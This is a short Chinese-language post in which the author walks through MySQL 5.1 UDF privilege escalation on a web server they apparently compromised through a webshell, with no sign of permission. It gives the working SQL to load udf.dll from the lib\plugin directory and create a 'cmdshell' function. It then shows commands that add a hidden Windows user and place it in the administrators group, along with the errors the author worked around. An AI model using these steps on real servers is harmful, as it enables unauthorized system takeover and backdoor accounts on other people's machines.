mysql5.1 udf提权

今儿遇见一个站，支持aspx，但是不定全满，找不到SA，逼迫使用udf提权，但是提权过程里面遇见了一些问题
可以导出

 

然后就去执行神马
create function cmdshell returns string soname 'c:\windows\udf.dll'

可是悲剧就来了

请检查SQL语句Create Function cmdshell returns string soname 'C:\\Windows\\udf.dll';的语法是否正确。No paths allowed for shared library

看提示是可以省略路径的

然后就去执行神马
create function cmdshell returns string soname 'udf.dll'

可是继续悲剧

数据库查讯出错，请检查SQL语句create function cmdshell returns string soname 'udf.dll'的语法是否正确。Can't open shared library 'udf.dll' (errno: 2 ) 

然后去百度了下

从MYSQL 5.1版本开始必须要把udf.dll文件放到MYSQL安装目录下的lib\plugin文件夹下才能创建自定义函数，并且该目录默认是不存在的，这就 需要我们使用webshell找到MYSQL的安装目录，并在安装目录下创建lib\plugin文件夹，然后将udf.dll文件导出到该目录即可。 

找到目录，居然存在，填写进去，导入成功
来创建函数
create function cmdshell returns string soname 'udf.dll'

 

 

mysql是5.0以上的，我们把udf.dll导出到windows的目录下(c:\\windows\\udf.dll)  root权限，然后执行下面的sql命令

create function cmdshell returns string soname 'udf.dll'
select cmdshell('net user asp.net XX /add')
select cmdshell('net localgroup administrators asp.net /add');
select cmdshell('net user')